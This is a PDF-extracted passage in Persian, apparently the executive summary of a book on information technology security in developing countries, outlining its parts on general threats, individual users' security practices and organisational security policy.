ﻣﻲﻛﻨﻨﺪ ﺑﺴﺮﻋﺖ ﺭﻭ ﺑﻪ ﺗﻐﻴﻴﺮ ﻣﻲﺑﺎﺷـﺪ .ﭘﻴـﺪﺍﻳﺶ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ
ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ ﺗﺠـﺎﺭﺕ
ﺍﻟﻜﺘﺮﻭﻧﻴــﻚ ﻧﻴــﺰ ﻣﻮﺟــﺐ ﺑــﺮﻭﺯ ﭘﻴﭽﻴــﺪﮔﻴﻬﺎﻳﻲ ﺩﺭ ﻣﺤﻴﻄﻬــﺎﻱ
ﺷﺒﻜﻪﺍﻱ ﺷﺪﻩﺍﻧﺪ.
ﺍﺯ ﻫﻨﮕﺎﻡ ﻇﻬﻮﺭ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧـﻮﺩﭘﺮﺩﺍﺯ ﮔﺮﻓﺘـﻪ ﺗـﺎ ﺯﻣـﺎﻥ ﺭﻭﺍﺝ
ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ،٦ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﻣﻮﺟﺐ ﺻﺮﻓﻪﺟـﻮﻳﻲ ﻣﻨﺎﺳـﺐ
ﺩﺭ ﻫﺰﻳﻨﻪﻫﺎ ﻣﻲﺷﻮﻧﺪ ،ﺍﻣﺎ ﺗﻬﺪﻳﺪﺍﺕ ﻭ ﺧﻄﺮﺍﺕ ﺑﺎﻟﻘﻮﻩﺍﻱ ﻧﻴـﺰ ﺑـﻪ
ﻫﻤﺮﺍﻩ ﺩﺍﺭﻧﺪ.
Firewall
Virus Scanner
Encryption
Personal Digital Assistants
Online Banking
2
3
4
5
6
٢٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺁﻧﭽﻪ ﻛﻪ ﺍﻭﺿﺎﻉ ﺭﺍ ﺑﺪﺗﺮ ﻣﻲﻛﻨﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻛﻨﻮﻥ ﻧﻔـﻮﺫﮔﺮﺍﻥ
ﻗﺎﺩﺭ ﺑﻪ ﺗﻮﺳﻌﻪ ﻭ ﮔـﺴﺘﺮﺵ ﺗﻬﺪﻳـﺪﺍﺕ ﺧـﻮﺩ ﻣـﻲﺑﺎﺷـﻨﺪ :ﻣﺜـﻞ
ﺗﺮﻛﻴﺒــﻲ ﺍﺯ ﻭﻳﺮﻭﺳــﻬﺎ ،٧ﻛﺮﻣﻬــﺎ ٨ﻭ ﺗﺮﺍﻭﺍﻫــﺎﻳﻲ ٩ﻛــﻪ ﻣــﻲﺗﻮﺍﻧــﺪ
ﺁﺳﻴﺒﻬﺎﻱ ﺷﺪﻳﺪﺗﺮﻱ ﺭﺍ ﺑﻪ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺩﺍﺩﻩﻫﺎ ﻭﺍﺭﺩ ﻛﻨﺪ .ﺍﻳﻦ
ﺻــﺪﻣﺎﺕ ﺣﺘــﻲ ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﺍﺯ ﺑﻌــﻀﻲ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﻣﺨــﺮﺏ
)ﺑﺪﺍﻓﺰﺍﺭﻫﺎ( ١٠ﻧﻴـﺰ ﺧﻄﺮﻧـﺎﻛﺘﺮ ﺑﺎﺷـﻨﺪ .ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ ﺗﻤـﺎﻣﻲ ﺍﻳـﻦ
ﭘﻴﺸﺮﻓﺘﻬﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﺩﺭ ﺳﻄﺢ ﺟﻬﺎﻧﻲ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻗـﺮﺍﺭ
ﻣﻲﺩﻫﻨﺪ ،ﺑﻬﺘﺮﻳﻦ ﺭﻭﺷﻬﺎﻱ ﻣﻘﺎﺑﻠﻪ ﺑـﺎ ﺗﻬﺪﻳـﺪﺍﺕ ﻧﺎﺷـﻲ ﺍﺯ ﺁﻧﻬـﺎ
ﺗﻨﻬﺎ ﺍﺯ ﻃﺮﻳﻖ ﻫﻤﻜﺎﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺣﺎﺻﻞ ﻣﻲﺷﻮﺩ.
ﻫﻤﻜﺎﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻭ ﺍﻣﻨﻴﺖ ﺩﺭ
ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ
ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺍﺯ
ﺍﻫﻤﻴﺖ ﺷـﺎﻳﺎﻧﻲ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﺍﺳـﺖ .ﻭﺍﺿـﺢ ﺍﺳـﺖ ﻛـﻪ ﺍﻳﻨﺘﺮﻧـﺖ
ﻓﺮﺻﺘﻬﺎﻳﻲ ﻃﻼﻳﻲ ﺑﺮﺍﻱ ﺗﺠﺎﺭﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻓـﺮﺍﻫﻢ ﺁﻭﺭﺩﻩ ﻛـﻪ
ﺣﺪﻭﺩ ﺩﻩ ﺳﺎﻝ ﻗﺒﻞ ﺣﺘﻲ ﺗﺼﻮﺭ ﺁﻧﻬﺎ ﻣﺸﻜﻞ ﺑﻮﺩ .ﺍﻟﺒﺘﻪ ﺩﺳﺘﺮﺳﻲ
ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻫﻤﻴﺸﻪ ﻫﻢ ﺍﺭﺯﺍﻥ ﻧﻴﺴﺖ .ﺍﻳﻨﺘﺮﻧﺖ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍ ﻗـﺎﺩﺭ
ﻣﻲﺳﺎﺯﺩ ﺗﺎ ﻧﮕﺎﻫﻲ ﺑـﻪ ﮔـﺴﺘﺮﺓ ﻭﺳـﻴﻌﻲ ﺍﺯ ﻣﻮﺿـﻮﻋﺎﺕ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷــﻨﺪ ﻭ ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺍﺭﺗﺒــﺎﻁ ﻣــﺮﺩﻡ ﺍﺯ ﻃﺮﻳــﻖ ﭘــﺴﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺴﻴﺎﺭ ﻛﺎﺭﺁﻣﺪﺗﺮ ﺍﺯ ﺧﺪﻣﺎﺕ ﭘﺴﺘﻲ ﺳﻨﺘﻲ ﺷﺪﻩ ﺍﺳﺖ.
ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮ ﺍﺻﻮﻝ ﺗﺠﺎﺭﺕ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻧﻴﺰ ﺗـﺄﺛﻴﺮ ﮔﺬﺍﺷـﺘﻪ ﺍﺳـﺖ؛
ﺑﺎﺯﺍﺭﻫﺎﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺍﻛﻨﻮﻥ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﻛﺎﻻﻫـﺎﻱ
ﺧﻮﺩ ﺭﺍ ﺑﺼﻮﺭﺕ ﺑﺮﺧﻂ ١١ﺑﻔﺮﻭﺷﻨﺪ .ﺍﮔﺮﭼﻪ ﻫﻨـﻮﺯ ﺗﻌـﺪﺍﺩ ﺭﻗﺒـﺎ ﺩﺭ
ﺑﺎﺯﺍﺭ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺍﺳﺖ ،ﺍﻣﺎ ﻣﺸﺘﺮﻳﺎﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺴﺎﺩﮔﻲ ﺗﻮﺍﻧﺎﻳﻴﻬـﺎ
ﻭ ﻣﺤﺼﻮﻻﺕ ﺷﺮﻛﺘﻬﺎﻱ ﺭﻗﻴﺐ ﺭﺍ ﺑﺒﻴﻨﻨﺪ ﻭ ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺍﻳﻨﻜـﺎﺭ
ﻧﻴﺎﺯﻱ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻭﺳﻴﻊ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﻧﺪﺍﺭﻧـﺪ .ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ
ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺁﻧﺴﻮﻱ ﻣﺮﺯﻫﺎﻱ ﺟﻐﺮﺍﻓﻴـﺎﻳﻲ ﺑـﺮﺍﻱ ﻫـﺮ
ﺳﻴﺴﺘﻢ ﺍﻗﺘﺼﺎﺩﻱ ﺑﺴﻴﺎﺭ ﺟـﺬﺍﺏ ﺍﺳـﺖ ،ﻫﻤﻜـﺎﺭﻱ ﮔـﺴﺘﺮﺩﻩﺍﻱ
ﺑﺮﺍﻱ ﺟﺎ ﺍﻓﺘﺎﺩﻥ ﻣﺪﻝ ﻳﻚ ﻧﻈﺎﻡ ﺷﺒﻜﻪﺍﻱ ﻛﺎﺭﺁﻣﺪ ﻭ ﺟﻬﺎﻧﻲ ﻻﺯﻡ
ﺍﺳﺖ.
ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﻛﺘﺎﺏ:
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭ ﺣﺎﻝ ﺗﻮﺳﻌﻪ
Viruses
Worms
Trojans
)Malware (Malicious Software
Online
ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﺍﻭﻝ
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
ﺑﺨﺶ ﺍﻭﻝ ﻛﺘﺎﺏ ﻣﻘﺪﻣﻪﺍﻱ ﺑﺮ ﻣﺒﺎﺣـﺚ ﻛﻠـﻲ ﺍﻣﻨﻴـﺖ ﺩﺭ ﻋـﺼﺮ
ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﻣﻲﺑﺎﺷﺪ .ﻣﺮﺩﻡ ﺍﺯ ﮔﺬﺷﺘﻪ ﺗﺎ ﻛﻨﻮﻥ ﻫﻤﻴـﺸﻪ ﻧﮕـﺮﺍﻥ
ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺑﻮﺩﻩﺍﻧﺪ ،ﺍﻣﺎ ﺍﺑﺪﺍﻉ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺭﻭﻧﺪ ﻛﺎﺭ ﺭﺍ
ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺍﺳﺖ .ﺍﻳﻦ ﺑﺨﺶ ﻣﺤﺪﻭﺩﺓ ﻣﻮﺿﻮﻋﺎﺕ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺗﺮﺳﻴﻢ ﻛﺮﺩﻩ ﻭ ﺍﻧﻮﺍﻉ ﻣﺘﻌﺪﺩﻱ ﺍﺯ ﺍﻋﻤـﺎﻝ ﻧﺎﻣﻨﺎﺳـﺐ
ﺩﺭ ﻗﺒﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺭﺍ ﺗﻮﺿﻴﺢ ﻣﻲﺩﻫﺪ ﻭ ﺧﻄﺮﺍﺕ ﻛﺎﺭ ﺑﺎ
ﺁﻧﻬﺎ ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﺍﻗﺪﺍﻣﺎﺕ ﻣﻨﺎﺳﺐ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻣﻌﺮﻓﻲ ﻣﻲﻧﻤﺎﻳﺪ.
ﺑﺨﺶ ﺍﻭﻝ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺍﺳﺖ:
• ﺍﻧﻘﻼﺏ ﺩﻳﺠﻴﺘﺎﻝ
• ﺗﻌﺮﻳﻒ ﺍﻣﻨﻴﺖ
• ﭘﻴﺪﺍﻳﺶ ﻭ ﺭﺷﺪ ﺍﻳﻨﺘﺮﻧﺖ
• ﻛﻠﻴﺎﺕ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ
• ﻣﻬﺎﺟﻤﻴﻦ ﺑﻪ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺁﮔﺎﻫﻲ ﺍﺯ ﻣﻮﺿﻮﻋﺎﺕ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﺎﻧﻨﺪ ﻭﺟﻮﺩ
ﻭ ﮔﺴﺘﺮﺵ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺧـﺎﺹ ،ﺑـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ،ﻣـﺪﻳﺮﺍﻥ ﻭ
ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﻛﻤـﻚ ﺧﻮﺍﻫـﺪ ﻛـﺮﺩ ﺗـﺎ ﺑـﺮﺍﻱ ﺗﻘﻮﻳـﺖ ﺍﻳﻤﻨـﻲ
ﺷﺒﻜﻪﻫﺎﻱ ﺧـﻮﺩ ﺩﺭ ﻣﻨـﺰﻝ ﻭ ﻳـﺎ ﻣﺤـﻞ ﻛـﺎﺭ ﺩﺭ ﻣﻘﺎﺑـﻞ ﻧﻘـﺾ
ﺣﺮﻳﻤﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﻣﺆﺛﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ.
ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﺩﻭﻡ
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺑﺨﺶ ﺩﻭﻡ ﻛﺘﺎﺏ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻣﻲﭘﺮﺩﺍﺯﺩ ﻛﻪ ﺍﺯ ﻣﻨﺎﺑﻊ ﺷﺒﻜﻪﺍﻱ ﻭ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﻣﺘﻌﺪﺩ ﺩﺭ ﻣﻨﺰﻝ ﻭ ﻳﺎ ﻣﺤﻞ ﻛـﺎﺭ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﻨﺪ ﻭ ﺍﻟﺒﺘﻪ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻜﻲ ﻛﻪ ﻗـﺎﺩﺭ ﺑـﻪ ﺗﻌﻴـﻴﻦ
ﺩﻗﻴــﻖ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﻭ ﺭﺍﻫﺒــﺮﻱ ﺁﻥ
ﺳﻴﺎﺳﺘﻬﺎ ﺩﺭ ﺳﻄﺢ ﺳﺎﺯﻣﺎﻧﻲ ﻧﻴﺴﺘﻨﺪ ﻧﻴﺰ ﻣﻔﻴﺪ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ .ﺍﻳـﻦ
ﺑﺨﺶ ﺑﻪ ﺗﺸﺮﻳﺢ ﺍﺻﻮﻝ ﺍﺳﺎﺳﻲ ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﭘﺮﺩﺍﺧﺘﻪ ﻭ
ﺩﺭ ﻣﻮﺭﺩ ﻓﻨﻮﻧﻲ ﻛﻪ ﻣﻮﺟﺐ ﻛﺎﻫﺶ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﻣـﻲﺷـﻮﻧﺪ
ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻳﻲ ﺍﺭﺍﺋﻪ ﻛﺮﺩﻩ ﺍﺳﺖ .ﺑﺮﺧﻲ ﺍﺯ ﻣﻮﺿﻮﻋﺎﺕ ﻣـﺬﻛﻮﺭ ﺩﺭ
ﺑﺨﺶ ﺩﻭﻡ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
•
7
8
9
10
11
ﺿﺮﻭﺭﺕ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﻭ ﺷﺒﻜﻪ؛ ﺗﺄﺛﻴﺮ ﺭﺧﻨﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ؛
٢١
ﺧﻼﺻﻪ ﺍﺟﺮﺍﻳﻲ
•
ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ،ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ ١٢ﺍﺯ ﻃﺮﻳـﻖ
ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ١٣ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ١٤؛
•
ﺍﺭﺯﻳﺎﺑﻲ ﺧﻄﺮ ﺍﻣﻨﻴﺘـﻲ ﻭ ﺗﺤﻠﻴـﻞ ﺍﻣﻨﻴـﺖ ﺩﺭ ﻳـﻚ ﺷـﺮﻛﺖ
ﻧﻮﻋﻲ؛
•
ﺍﻧﻮﺍﻉ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﻭ ﭼﮕﻮﻧﮕﻲ ﮔﺴﺘﺮﺵ ﺁﻧﻬﺎ؛
•
•
ﻣﺒﻨﺎﻱ ﻛﺎﺭ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﺩﻟﻴـﻞ ﺍﻳﻨﻜـﻪ
ﺍﺑﺰﺍﺭﻱ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺣﻤﻼﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﺴﺘﻨﺪ؛
ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﻳﻪ ﻫﺎﻱ ﭘﻴﺸﻨﻬﺎﺩﻱ ﺑﺮﺍﻱ ﺗﺪﻭﻳﻦ ﺑﺮﻧﺎﻣﻪﻫـﺎ ﻭ
ﻃﺮﺣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ؛
•
•
ﺍﺑﺰﺍﺭﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺷﺎﻣﻞ ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ ،ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ
ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ١٥؛
ﻧﻘﺶ ﻣﺪﻳﺮﻳﺖ ﺩﺭ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ،ﺷـﺒﻜﻪﻫـﺎ ﻭ
ﺩﺍﺩﻩﻫﺎ؛
•
•
ﻣﻔﺎﻫﻴﻢ ﭘﻴﺸﺮﻓﺘﻪﺗﺮﻱ ﭼﻮﻥ ﺳﺎﺧﺘﺎﺭ ﺷﺒﻜﻪﻫـﺎﻱ TCP/IP
ﺍﻣﻨﻴﺖ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺷﺎﻣﻞ ﺁﻣﻮﺯﺵ ﻭ ﺁﮔﺎﻫﻲ ،ﻓﺮﺁﻳﻨﺪ ﺍﺳﺘﺨﺪﺍﻡ
ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺍﻣﻨﻴﺘﻲ ﺧﺎﺭﺟﻲ؛
ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻋﻼﻗﻪﻣﻨﺪ.
ﺑﺨﺶ ﺩﻭﻡ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻭ ﺭﻭﺷﻬﺎﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ ﺭﺍ ﺍﺯ
ﻟﺤﺎﻅ ﻓﻨﻲ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﭘﻮﺷﺶ ﻣﻲﺩﻫﺪ .ﺍﻳﻦ ﺑﺨـﺶ ﺍﺯ ﺩﻳـﺪﮔﺎﻩ
ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﻧﮕﻲ ﻭ ﺑﺨﺶ ﺳﻮﻡ ﺍﺯ ﺩﻳـﺪﮔﺎﻩ ﺳـﺎﺯﻣﺎﻧﻲ ﺑـﻪ ﻣـﺴﺌﻠﻪ
ﺍﻣﻨﻴﺖ ﻣﻲﻧﮕﺮﺩ.
ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﺳﻮﻡ
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺑﺨﺶ ﺳﻮﻡ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺑﻌﺎﺩ ﺳﻴﺎﺳﺖ ﻭ ﺭﺍﻫﺒﺮﻱ ﺍﻣﻨﻴﺖ ﺭﺍ ﺍﺯ ﻧﮕﺎﻩ
ﺳﺎﺯﻣﺎﻧﻲ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ .ﺍﺗﺨﺎﺫ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣﻨﺎﺳـﺐ ﻭ
ﺍﺟﺮﺍﻱ ﺻﺤﻴﺢ ﺁﻧﻬﺎ ﺧﻄﺮ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﻧﺎﮔﻬـﺎﻧﻲ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ
ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ ،ﻭﺭﻭﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺭﺍ ﺑـﺴﻴﺎﺭ ﻣـﺸﻜﻠﺘﺮ
ﻣﻲﻛﻨـﺪ ﻭ ﺍﺑـﺰﺍﺭ ﺍﻣﻨﻴﺘـﻲ ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﻳﻲ ﺣﻤـﻼﺕ ﻭ ﺍﺻـﻼﺡ
ﺭﺧﻨﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣـﻲﺳـﺎﺯﺩ .ﺑـﺮﺍﻱ ﺣﻔـﻆ ﺩﺍﺩﻩﻫـﺎﻱ
ﻣﺤﺮﻣﺎﻧــﻪ ﻭ ﻛﻤــﻚ ﺑــﻪ ﻳﻜﭙــﺎﺭﭼﮕﻲ ﺑﺮﻧﺎﻣــﻪﻫــﺎ ﻭ ﺩﺍﺩﻩﻫــﺎﻱ
ﺫﺧﻴﺮﻩﺷﺪﻩ ﻭ ﺍﻧﺘﻘﺎﻝ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ،ﺑﺎﻳﺪ ﺗﻠﻔﻴﻘـﻲ ﺍﺯ
ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻥ ﺍﻧﺠﺎﻡ ﺷﻮﺩ .ﺍﻳﻦ ﺑﺨـﺶ ﺍﺟـﺰﺍﻱ
ﻣﺨﺘﻠﻒ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣـﺆﺛﺮ ﺑـﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠـﻒ
ﻣﺎﻧﻨﺪ ﺷـﺮﻛﺘﻬﺎﻱ ﺗﺠـﺎﺭﻱ ،ﺩﻭﻟﺘﻬـﺎ ،ﺩﺍﻧـﺸﮕﺎﻫﻬﺎ ﻭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﺭﺍ ﭘﻮﺷﺶ ﻣﻲﺩﻫﺪ.
ﺑﺨﺶ ﺳﻮﻡ ﻣﻮﺿﻮﻋﺎﺕ ﺯﻳﺮ ﺭﺍ ﺑﺼﻮﺭﺕ ﺩﻗﻴﻖ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ
ﻣﻲﺩﻫﺪ:
• ﺭﻭﺵ ﻫﺸﺖ ﺭﻛﻨﻲ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﻛـﻪ ﺧـﺼﻮﺻﹰﺎ ﺩﺭ
ﻣﺤﻴﻄﻬﺎﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻭ ﺍﻋﺘﺒﺎﺭﻱ ﺍﺭﺯﺷﻤﻨﺪ ﻫﺴﺘﻨﺪ؛
Authentication
Usernames
Passwords
Remote Access Tools
12
13
14
15
١٦
•
ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﮔﺰﺍﺭﺵ ﻭﻗﺎﻳﻊ ﻭ ﺗﺮﻣﻴﻢ ﺳﻮﺍﻧﺢ ؛
•
ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺑﻲﺳﻴﻢ ﺑﺮﺍﻱ ﺷﺮﻛﺘﻬﺎ؛ ﻭ
•
ﺭﺍﻫﻨﻤﺎﻳﻴﻬــﺎﻱ ﺿــﻤﻴﻤﻪ ﻭ ﻋــﻮﺍﻣﻠﻲ ﻛــﻪ ﺑــﻪ ﻃﺮﺍﺣــﻲ ﻭ
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﻣﻨﻴﺖ ﺳﺎﺯﻣﺎﻧﻲ ﻣﻨﺎﺳﺐ ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ.
ﻫﻤﭽﻨﻴﻦ ﺑﺨﺶ ﺳﻮﻡ ﺑـﺮ ﺳﻴﺎﺳـﺘﻬﺎﻳﻲ ﻛـﻪ ﺑﻄـﻮﺭ ﻣـﺴﺘﻘﻴﻢ ﺑـﺎ
ﻋﻤﻠﻴﺎﺕ ﺗﺠﺎﺭﻱ ،ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﻭ ﺩﻭﻟﺘـﻲ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺷـﺒﻜﻪﺍﻱ ﺩﺭ
ﺍﺭﺗﺒﺎﻁ ﻫﺴﺘﻨﺪ ﻣﺮﻭﺭﻱ ﻛﻠﻲ ﻣﻲﻛﻨﺪ ﻭ ﺑﻪ ﻣﺒﺎﺣﺚ ﻣﺘﺨﺼـﺼﻴﻦ ﻭ
ﮔﻔﺘﮕﻮﻫﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺑﺎﻧـﻚ ﺟﻬـﺎﻧﻲ ﺩﺭﺑـﺎﺭﺓ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ ﻣﻲﭘﺮﺩﺍﺯﺩ .ﺑﺨﺶ ﭼﻬﺎﺭﻡ ﻣﺒﺎﺣﺚ ﻋﻤﻴﻖﺗﺮﻱ ﺭﺍﺟﻊ ﺑـﻪ
